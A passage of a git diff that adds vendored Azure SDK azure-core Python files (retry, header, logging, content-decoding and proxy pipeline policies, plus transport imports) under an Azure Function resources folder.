bad status codes. Default value is 3. + + :keyword float retry_backoff_factor: A backoff factor to apply between attempts after the second try + (most errors are resolved immediately by a second try without a delay). + Retry policy will sleep for: `{backoff factor} * (2 ** ({number of total retries} - 1))` + seconds. If the backoff_factor is 0.1, then the retry will sleep + for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is 0.8. + + :keyword int retry_backoff_max: The maximum back off time. Default value is 120 seconds (2 minutes). + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START async_retry_policy] + :end-before: [END async_retry_policy] + :language: python + :dedent: 4 + :caption: Configuring an async retry policy. + """ + + async def _sleep_for_retry(self, response, transport): # pylint:disable=invalid-overridden-method + """Sleep based on the Retry-After response header value. + + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :param transport: The HTTP transport type. + """ + retry_after = self.get_retry_after(response) + if retry_after: + await transport.sleep(retry_after) + return True + return False + + async def _sleep_backoff(self, settings, transport): # pylint:disable=invalid-overridden-method + """Sleep using exponential backoff. Immediately returns if backoff is 0. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + """ + backoff = self.get_backoff_time(settings) + if backoff <= 0: + return + await transport.sleep(backoff) + + async def sleep(self, settings, transport, response=None): # pylint:disable=invalid-overridden-method + """Sleep between retry attempts. + + This method will respect a server's ``Retry-After`` response header + and sleep the duration of the time requested. If that is not present, it + will use an exponential backoff. By default, the backoff factor is 0 and + this method will return immediately. + + :param dict settings: The retry settings. + :param transport: The HTTP transport type. + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + if response: + slept = await self._sleep_for_retry(response, transport) + if slept: + return + await self._sleep_backoff(settings, transport) + + async def send(self, request): # pylint:disable=invalid-overridden-method + """Uses the configured retry policy to send the request to the next policy in the pipeline. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raise: ~azure.core.exceptions.AzureError if maximum retries exceeded. + :raise: ~azure.core.exceptions.ClientAuthenticationError if authentication fails + """ + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + self._configure_positions(request, retry_settings) + + absolute_timeout = retry_settings['timeout'] + is_response_error = True + + while retry_active: + try: + start_time = time.time() + self._configure_timeout(request, absolute_timeout, is_response_error) + response = await self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + await self.sleep(retry_settings, request.context.transport, response=response) + is_response_error = True + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except AzureError as err: + if absolute_timeout > 0 and self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + await self.sleep(retry_settings, request.context.transport) + if isinstance(err, ServiceRequestError): + is_response_error = False + else: + is_response_error = True + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py new file mode 100644 index 0000000..5e1acc4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_universal.py @@ -0,0 +1,701 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import json +import inspect +import logging +import os +import platform +import xml.etree.ElementTree as ET +import types +import re +import uuid +from typing import (Mapping, IO, TypeVar, TYPE_CHECKING, Type, cast, List, Callable, Iterator, # pylint: disable=unused-import + Any, Union, Dict, Optional, AnyStr) +from six.moves import urllib + +from azure.core import __version__ as azcore_version +from azure.core.exceptions import ( + DecodeError, + raise_with_traceback +) + +from azure.core.pipeline import PipelineRequest, PipelineResponse +from ._base import SansIOHTTPPolicy + +if TYPE_CHECKING: + from azure.core.pipeline.transport import HttpResponse, AsyncHttpResponse + +_LOGGER = logging.getLogger(__name__) +ContentDecodePolicyType = TypeVar('ContentDecodePolicyType', bound='ContentDecodePolicy') +HTTPRequestType = TypeVar("HTTPRequestType") +HTTPResponseType = TypeVar("HTTPResponseType") + + +class HeadersPolicy(SansIOHTTPPolicy): + """A simple policy that sends the given headers with the request. + + This will overwrite any headers already defined in the request. Headers can be + configured up front, where any custom headers will be applied to all outgoing + operations, and additional headers can also be added dynamically per operation. + + :param dict base_headers: Headers to send with the request. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START headers_policy] + :end-before: [END headers_policy] + :language: python + :dedent: 4 + :caption: Configuring a headers policy. + """ + def __init__(self, base_headers=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Dict[str, str], Any) -> None + self._headers = base_headers or {} + self._headers.update(kwargs.pop('headers', {})) + + @property + def headers(self): + """The current headers collection.""" + return self._headers + + def add_header(self, key, value): + """Add a header to the configuration to be applied to all requests. + + :param str key: The header. + :param str value: The header's value. + """ + self._headers[key] = value + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Updates with the given headers before sending the request to the next policy. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + """ + request.http_request.headers.update(self.headers) + additional_headers = request.context.options.pop('headers', {}) + if additional_headers: + request.http_request.headers.update(additional_headers) + +class _Unset(object): + pass + +class RequestIdPolicy(SansIOHTTPPolicy): + """A simple policy that sets the given request id in the header. + + This will overwrite request id that is already defined in the request. Request id can be + configured up front, where the request id will be applied to all outgoing + operations, and additional request id can also be set dynamically per operation. + + :keyword str request_id: The request id to be added into header. + :keyword bool auto_request_id: Auto generates a unique request ID per call if true which is by default. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START request_id_policy] + :end-before: [END request_id_policy] + :language: python + :dedent: 4 + :caption: Configuring a request id policy. + """ + def __init__(self, **kwargs): # pylint: disable=super-init-not-called + # type: (dict) -> None + self._request_id = kwargs.pop('request_id', _Unset) + self._auto_request_id = kwargs.pop('auto_request_id', True) + + def set_request_id(self, value): + """Add the request id to the configuration to be applied to all requests. + + :param str value: The request id value. + """ + self._request_id = value + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Updates with the given request id before sending the request to the next policy. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + """ + request_id = unset = object() + if 'request_id' in request.context.options: + request_id = request.context.options.pop('request_id') + if request_id is None: + return + elif self._request_id is None: + return + elif self._request_id is not _Unset: + if "x-ms-client-request-id" in request.http_request.headers: + return + request_id = self._request_id + elif self._auto_request_id: + if "x-ms-client-request-id" in request.http_request.headers: + return + request_id = str(uuid.uuid1()) + if request_id is not unset: + header = {"x-ms-client-request-id": request_id} + request.http_request.headers.update(header) + +class UserAgentPolicy(SansIOHTTPPolicy): + """User-Agent Policy. Allows custom values to be added to the User-Agent header. + + :param str base_user_agent: Sets the base user agent value. + + :keyword bool user_agent_overwrite: Overwrites User-Agent when True. Defaults to False. + :keyword bool user_agent_use_env: Gets user-agent from environment. Defaults to True. + :keyword str user_agent: If specified, this will be added in front of the user agent string. + :keyword str sdk_moniker: If specified, the user agent string will be + azsdk-python-[sdk_moniker] Python/[python_version] ([platform_version]) + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START user_agent_policy] + :end-before: [END user_agent_policy] + :language: python + :dedent: 4 + :caption: Configuring a user agent policy. + """ + _USERAGENT = "User-Agent" + _ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT' + + def __init__(self, base_user_agent=None, **kwargs): # pylint: disable=super-init-not-called + # type: (Optional[str], **Any) -> None + self.overwrite = kwargs.pop('user_agent_overwrite', False) + self.use_env = kwargs.pop('user_agent_use_env', True) + application_id = kwargs.pop('user_agent', None) + sdk_moniker = kwargs.pop('sdk_moniker', 'core/{}'.format(azcore_version)) + + if base_user_agent: + self._user_agent = base_user_agent + else: + self._user_agent = "azsdk-python-{} Python/{} ({})".format( + sdk_moniker, + platform.python_version(), + platform.platform() + ) + + if application_id: + self._user_agent = "{} {}".format(application_id, self._user_agent) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + if self.use_env: + add_user_agent_header = os.environ.get(self._ENV_ADDITIONAL_USER_AGENT, None) + if add_user_agent_header is not None: + return "{} {}".format(self._user_agent, add_user_agent_header) + return self._user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + :param str value: value to add to user agent. + """ + self._user_agent = "{} {}".format(self._user_agent, value) + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Modifies the User-Agent header before the request is sent. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options_dict = request.context.options + if 'user_agent' in options_dict: + user_agent = options_dict.pop('user_agent') + if options_dict.pop('user_agent_overwrite', self.overwrite): + http_request.headers[self._USERAGENT] = user_agent + else: + user_agent = "{} {}".format(user_agent, self.user_agent) + http_request.headers[self._USERAGENT] = user_agent + + elif self.overwrite or self._USERAGENT not in http_request.headers: + http_request.headers[self._USERAGENT] = self.user_agent + + +class NetworkTraceLoggingPolicy(SansIOHTTPPolicy): + + """The logging policy in the pipeline is used to output HTTP network trace to the configured logger. + + This accepts both global configuration, and per-request level with "enable_http_logger" + + :param bool logging_enable: Use to enable per operation. Defaults to False. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START network_trace_logging_policy] + :end-before: [END network_trace_logging_policy] + :language: python + :dedent: 4 + :caption: Configuring a network trace logging policy. + """ + def __init__(self, logging_enable=False, **kwargs): # pylint: disable=unused-argument + self.enable_http_logger = logging_enable + + def on_request(self, request): # pylint: disable=too-many-return-statements + # type: (PipelineRequest) -> None + """Logs HTTP request to the DEBUG logger. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options = request.context.options + logging_enable = options.pop("logging_enable", self.enable_http_logger) + request.context["logging_enable"] = logging_enable + if logging_enable: + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + log_string = "Request URL: '{}'".format(http_request.url) + log_string += "\nRequest method: '{}'".format(http_request.method) + log_string += "\nRequest headers:" + for header, value in http_request.headers.items(): + log_string += "\n '{}': '{}'".format(header, value) + log_string += "\nRequest body:" + + # We don't want to log the binary data of a file upload. + if isinstance(http_request.body, types.GeneratorType): + log_string += "\nFile upload" + _LOGGER.debug(log_string) + return + try: + if isinstance(http_request.body, types.AsyncGeneratorType): + log_string += "\nFile upload" + _LOGGER.debug(log_string) + return + except AttributeError: + pass + if http_request.body: + log_string += "\n{}".format(str(http_request.body)) + _LOGGER.debug(log_string) + return + log_string += "\nThis request has no body" + _LOGGER.debug(log_string) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log request: %r", err) + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Logs HTTP response to the DEBUG logger. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + http_response = response.http_response + try: + logging_enable = response.context["logging_enable"] + if logging_enable: + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + log_string = "Response status: '{}'".format(http_response.status_code) + log_string += "\nResponse headers:" + for res_header, value in http_response.headers.items(): + log_string += "\n '{}': '{}'".format(res_header, value) + + # We don't want to log binary data if the response is a file. + log_string += "\nResponse content:" + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = http_response.headers.get('content-disposition') + + if header and pattern.match(header): + filename = header.partition('=')[2] + log_string += "\nFile attachments: {}".format(filename) + elif http_response.headers.get("content-type", "").endswith("octet-stream"): + log_string += "\nBody contains binary data." + elif http_response.headers.get("content-type", "").startswith("image"): + log_string += "\nBody contains image data." + else: + if response.context.options.get('stream', False): + log_string += "\nBody is streamable." + else: + log_string += "\n{}".format(http_response.text()) + _LOGGER.debug(log_string) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + + +class HttpLoggingPolicy(SansIOHTTPPolicy): + """The Pipeline policy that handles logging of HTTP requests and responses. + """ + + DEFAULT_HEADERS_WHITELIST = set([ + "x-ms-request-id", + "x-ms-client-request-id", + "x-ms-return-client-request-id", + "traceparent", + "Accept", + "Cache-Control", + "Connection", + "Content-Length", + "Content-Type", + "Date", + "ETag", + "Expires", + "If-Match", + "If-Modified-Since", + "If-None-Match", + "If-Unmodified-Since", + "Last-Modified", + "Pragma", + "Request-Id", + "Retry-After", + "Server", + "Transfer-Encoding", + "User-Agent", + "WWW-Authenticate", # OAuth Challenge header. + ]) + REDACTED_PLACEHOLDER = "REDACTED" + MULTI_RECORD_LOG = "AZURE_SDK_LOGGING_MULTIRECORD" + + def __init__(self, logger=None, **kwargs): # pylint: disable=unused-argument + self.logger = logger or logging.getLogger( + "azure.core.pipeline.policies.http_logging_policy" + ) + self.allowed_query_params = set() + self.allowed_header_names = set(self.__class__.DEFAULT_HEADERS_WHITELIST) + + def _redact_query_param(self, key, value): + lower_case_allowed_query_params = [ + param.lower() for param in self.allowed_query_params + ] + return value if key.lower() in lower_case_allowed_query_params else HttpLoggingPolicy.REDACTED_PLACEHOLDER + + def _redact_header(self, key, value): + lower_case_allowed_header_names = [ + header.lower() for header in self.allowed_header_names + ] + return value if key.lower() in lower_case_allowed_header_names else HttpLoggingPolicy.REDACTED_PLACEHOLDER + + def on_request(self, request): # pylint: disable=too-many-return-statements + # type: (PipelineRequest) -> None + """Logs HTTP method, url and headers. + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options = request.context.options + # Get logger in my context first (request has been retried) + # then read from kwargs (pop if that's the case) + # then use my instance logger + logger = request.context.setdefault("logger", options.pop("logger", self.logger)) + + if not logger.isEnabledFor(logging.INFO): + return + + try: + parsed_url = list(urllib.parse.urlparse(http_request.url)) + parsed_qp = urllib.parse.parse_qsl(parsed_url[4], keep_blank_values=True) + filtered_qp = [(key, self._redact_query_param(key, value)) for key, value in parsed_qp] + # 4 is query + parsed_url[4] = "&".join(["=".join(part) for part in filtered_qp]) + redacted_url = urllib.parse.urlunparse(parsed_url) + + multi_record = os.environ.get(HttpLoggingPolicy.MULTI_RECORD_LOG, False) + if multi_record: + logger.info("Request URL: %r", redacted_url) + logger.info("Request method: %r", http_request.method) + logger.info("Request headers:") + for header, value in http_request.headers.items(): + value = self._redact_header(header, value) + logger.info(" %r: %r", header, value) + if isinstance(http_request.body, types.GeneratorType): + logger.info("File upload") + return + try: + if isinstance(http_request.body, types.AsyncGeneratorType): + logger.info("File upload") + return + except AttributeError: + pass + if http_request.body: + logger.info("A body is sent with the request") + return + logger.info("No body was attached to the request") + return + log_string = "Request URL: '{}'".format(redacted_url) + log_string += "\nRequest method: '{}'".format(http_request.method) + log_string += "\nRequest headers:" + for header, value in http_request.headers.items(): + value = self._redact_header(header, value) + log_string += "\n '{}': '{}'".format(header, value) + if isinstance(http_request.body, types.GeneratorType): + log_string += "\nFile upload" + logger.info(log_string) + return + try: + if isinstance(http_request.body, types.AsyncGeneratorType): + log_string += "\nFile upload" + logger.info(log_string) + return + except AttributeError: + pass + if http_request.body: + log_string += "\nA body is sent with the request" + logger.info(log_string) + return + log_string += "\nNo body was attached to the request" + logger.info(log_string) + + except Exception as err: # pylint: disable=broad-except + logger.warning("Failed to log request: %s", repr(err)) + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + http_response = response.http_response + + try: + logger = response.context["logger"] + + if not logger.isEnabledFor(logging.INFO): + return + + multi_record = os.environ.get(HttpLoggingPolicy.MULTI_RECORD_LOG, False) + if multi_record: + logger.info("Response status: %r", http_response.status_code) + logger.info("Response headers:") + for res_header, value in http_response.headers.items(): + value = self._redact_header(res_header, value) + logger.info(" %r: %r", res_header, value) + return + log_string = "Response status: {}".format(http_response.status_code) + log_string += "\nResponse headers:" + for res_header, value in http_response.headers.items(): + value = self._redact_header(res_header, value) + log_string += "\n '{}': '{}'".format(res_header, value) + logger.info(log_string) + except Exception as err: # pylint: disable=broad-except + logger.warning("Failed to log response: %s", repr(err)) + +class ContentDecodePolicy(SansIOHTTPPolicy): + """Policy for decoding unstreamed response content. + + :param response_encoding: The encoding to use if known for this service (will disable auto-detection) + :type response_encoding: str + """ + # Accept "text" because we're open minded people... + JSON_REGEXP = re.compile(r'^(application|text)/([0-9a-z+.-]+\+)?json$') + + # Name used in context + CONTEXT_NAME = "deserialized_data" + + def __init__(self, response_encoding=None, **kwargs): # pylint: disable=unused-argument + # type: (Optional[str], Any) -> None + self._response_encoding = response_encoding + + @classmethod + def deserialize_from_text( + cls, # type: Type[ContentDecodePolicyType] + data, # type: Optional[Union[AnyStr, IO]] + mime_type=None, # Optional[str] + response=None # Optional[Union[HttpResponse, AsyncHttpResponse]] + ): + """Decode response data according to content-type. + + Accept a stream of data as well, but will be load at once in memory for now. + If no content-type, will return the string version (not bytes, not stream) + + :param response: The HTTP response. + :type response: ~azure.core.pipeline.transport.HttpResponse + :param str mime_type: The mime type. As mime type, charset is not expected. + :param response: If passed, exception will be annotated with that response + :raises ~azure.core.exceptions.DecodeError: If deserialization fails + :returns: A dict or XML tree, depending of the mime_type + """ + if not data: + return None + + if hasattr(data, 'read'): + # Assume a stream + data = cast(IO, data).read() + + if isinstance(data, bytes): + data_as_str = data.decode(encoding='utf-8-sig') + else: + # Explain to mypy the correct type. + data_as_str = cast(str, data) + + if mime_type is None: + return data_as_str + + if cls.JSON_REGEXP.match(mime_type): + try: + return json.loads(data_as_str) + except ValueError as err: + raise DecodeError(message="JSON is invalid: {}".format(err), response=response, error=err) + elif "xml" in (mime_type or []): + try: + try: + if isinstance(data, unicode): # type: ignore + # If I'm Python 2.7 and unicode XML will scream if I try a "fromstring" on unicode string + data_as_str = cast(str, data_as_str.encode(encoding="utf-8")) + except NameError: + pass + return ET.fromstring(data_as_str) # nosec + except ET.ParseError: + # It might be because the server has an issue, and returned JSON with + # content-type XML.... + # So let's try a JSON load, and if it's still broken + # let's flow the initial exception + def _json_attemp(data): + try: + return True, json.loads(data) + except ValueError: + return False, None # Don't care about this one + success, json_result = _json_attemp(data) + if success: + return json_result + # If i'm here, it's not JSON, it's not XML, let's scream + # and raise the last context in this block (the XML exception) + # The function hack is because Py2.7 messes up with exception + # context otherwise. + _LOGGER.critical("Wasn't XML not JSON, failing") + raise_with_traceback(DecodeError, message="XML is invalid", response=response) + elif mime_type.startswith("text/"): + return data_as_str + raise DecodeError("Cannot deserialize content-type: {}".format(mime_type)) + + @classmethod + def deserialize_from_http_generics( + cls, # type: Type[ContentDecodePolicyType] + response, # Union[HttpResponse, AsyncHttpResponse] + encoding=None, # Optional[str] + ): + """Deserialize from HTTP response. + + Headers will tested for "content-type" + + :param response: The HTTP response + :param encoding: The encoding to use if known for this service (will disable auto-detection) + :raises ~azure.core.exceptions.DecodeError: If deserialization fails + :returns: A dict or XML tree, depending of the mime-type + """ + # Try to use content-type from headers if available + if response.content_type: + mime_type = response.content_type.split(";")[0].strip().lower() + # Ouch, this server did not declare what it sent... + # Let's guess it's JSON... + # Also, since Autorest was considering that an empty body was a valid JSON, + # need that test as well.... + else: + mime_type = "application/json" + + # Rely on transport implementation to give me "text()" decoded correctly + if hasattr(response, "read"): + try: + # since users can call deserialize_from_http_generics by themselves + # we want to make sure our new responses are read before we try to + # deserialize. Only read sync responses since we're in a sync function + if not inspect.iscoroutinefunction(response.read): + response.read() + except AttributeError: + # raises an AttributeError in 2.7 bc inspect.iscoroutinefunction was added in 3.5 + # Entering here means it's 2.7 and that the response has a read method, so we read + # bc it will be sync. + response.read() + return cls.deserialize_from_text(response.text(encoding), mime_type, response=response) + + def on_request(self, request): + # type: (PipelineRequest) -> None + options = request.context.options + response_encoding = options.pop("response_encoding", self._response_encoding) + if response_encoding: + request.context["response_encoding"] = response_encoding + + def on_response(self, + request, # type: PipelineRequest[HTTPRequestType] + response # type: PipelineResponse[HTTPRequestType, Union[HttpResponse, AsyncHttpResponse]] + ): + # type: (...) -> None + """Extract data from the body of a REST response object. + This will load the entire payload in memory. + Will follow Content-Type to parse. + We assume everything is UTF8 (BOM acceptable). + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :param raw_data: Data to be processed. + :param content_type: How to parse if raw_data is a string/bytes. + :raises JSONDecodeError: If JSON is requested and parsing is impossible. + :raises UnicodeDecodeError: If bytes is not UTF8 + :raises xml.etree.ElementTree.ParseError: If bytes is not valid XML + :raises ~azure.core.exceptions.DecodeError: If deserialization fails + """ + # If response was asked as stream, do NOT read anything and quit now + if response.context.options.get("stream", True): + return + + response_encoding = request.context.get('response_encoding') + + response.context[self.CONTEXT_NAME] = self.deserialize_from_http_generics( + response.http_response, + response_encoding + ) + + +class ProxyPolicy(SansIOHTTPPolicy): + """A proxy policy. + + Dictionary mapping protocol or protocol and host to the URL of the proxy + to be used on each Request. + + :param dict proxies: Maps protocol or protocol and hostname to the URL + of the proxy. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START proxy_policy] + :end-before: [END proxy_policy] + :language: python + :dedent: 4 + :caption: Configuring a proxy policy. + """ + def __init__(self, proxies=None, **kwargs): #pylint: disable=unused-argument,super-init-not-called + self.proxies = proxies + + def on_request(self, request): + # type: (PipelineRequest) -> None + ctxt = request.context.options + if self.proxies and "proxies" not in ctxt: + ctxt["proxies"] = self.proxies diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py new file mode 100644 index 0000000..606dd7c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py @@ -0,0 +1,69 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import datetime +import email.utils +from ...utils._utils import _FixedOffset, case_insensitive_dict + +def _parse_http_date(text): + """Parse a HTTP date format into datetime.""" + parsed_date = email.utils.parsedate_tz(text) + return datetime.datetime( + *parsed_date[:6], + tzinfo=_FixedOffset(parsed_date[9]/60) + ) + +def parse_retry_after(retry_after): + """Helper to parse Retry-After and get value in seconds. + + :param str retry_after: Retry-After header + :rtype: int + """ + try: + delay = int(retry_after) + except ValueError: + # Not an integer? Try HTTP date + retry_date = _parse_http_date(retry_after) + delay = (retry_date - datetime.datetime.now(retry_date.tzinfo)).total_seconds() + return max(0, delay) + +def get_retry_after(response): + """Get the value of Retry-After in seconds. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Value of Retry-After in seconds. + :rtype: float or None + """ + headers = case_insensitive_dict(response.http_response.headers) + retry_after = headers.get("retry-after") + if retry_after: + return parse_retry_after(retry_after) + for ms_header in ["retry-after-ms", "x-ms-retry-after-ms"]: + retry_after = headers.get(ms_header) + if retry_after: + parsed_retry_after = parse_retry_after(retry_after) + return parsed_retry_after / 1000.0 + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py new file mode 100644 index 0000000..178e574 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py @@ -0,0 +1,160 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import sys +from ._base import HttpTransport, HttpRequest, HttpResponse + +__all__ = [ + 'HttpTransport', + 'HttpRequest', + 'HttpResponse', +] + +# pylint: disable=unused-import, redefined-outer-name +try: + from ._requests_basic import RequestsTransport, RequestsTransportResponse + __all__.extend([ + 'RequestsTransport', + 'RequestsTransportResponse', + ]) + try: + from ._base_async import AsyncHttpTransport, AsyncHttpResponse + from ._requests_asyncio import AsyncioRequestsTransport, AsyncioRequestsTransportResponse + + __all__.extend([ + 'AsyncHttpTransport', + 'AsyncHttpResponse', + 'AsyncioRequestsTransport', + 'AsyncioRequestsTransportResponse' + ]) + + if sys.version_info >= (3, 7): + __all__.extend([ + 'TrioRequestsTransport', + 'TrioRequestsTransportResponse', + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + + def __dir__(): + return __all__ + + def __getattr__(name): + if name == 'AioHttpTransport': + try: + from ._aiohttp import AioHttpTransport + return AioHttpTransport + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'AioHttpTransportResponse': + try: + from ._aiohttp import AioHttpTransportResponse + return AioHttpTransportResponse + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'TrioRequestsTransport': + try: + from ._requests_trio import TrioRequestsTransport + return TrioRequestsTransport + except ImportError: + raise ImportError("trio package is not installed") + if name == 'TrioRequestsTransportResponse': + try: + from ._requests_trio import TrioRequestsTransportResponse + return TrioRequestsTransportResponse + except ImportError: + raise ImportError("trio package is not installed") + if name == '__bases__': + raise AttributeError("module 'azure.core.pipeline.transport' has no attribute '__bases__'") + return name + + else: + try: + from ._requests_trio import TrioRequestsTransport, TrioRequestsTransportResponse + + __all__.extend([ + 'TrioRequestsTransport', + 'TrioRequestsTransportResponse' + ]) + except ImportError: + pass # Trio not installed + + try: + from ._aiohttp import AioHttpTransport, AioHttpTransportResponse + + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + except ImportError: + pass # Aiohttp not installed + except (ImportError, SyntaxError): + # requests library is installed but asynchronous pipelines not supported. + pass +except (ImportError, SyntaxError): + # requests library is not installed + try: + from ._base_async import AsyncHttpTransport, AsyncHttpResponse + __all__.extend([ + 'AsyncHttpTransport', + 'AsyncHttpResponse', + ]) + + if sys.version_info >= (3, 7): + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + + def __dir__(): + return __all__ + + def __getattr__(name): + if name == 'AioHttpTransport': + try: + from ._aiohttp import AioHttpTransport + return 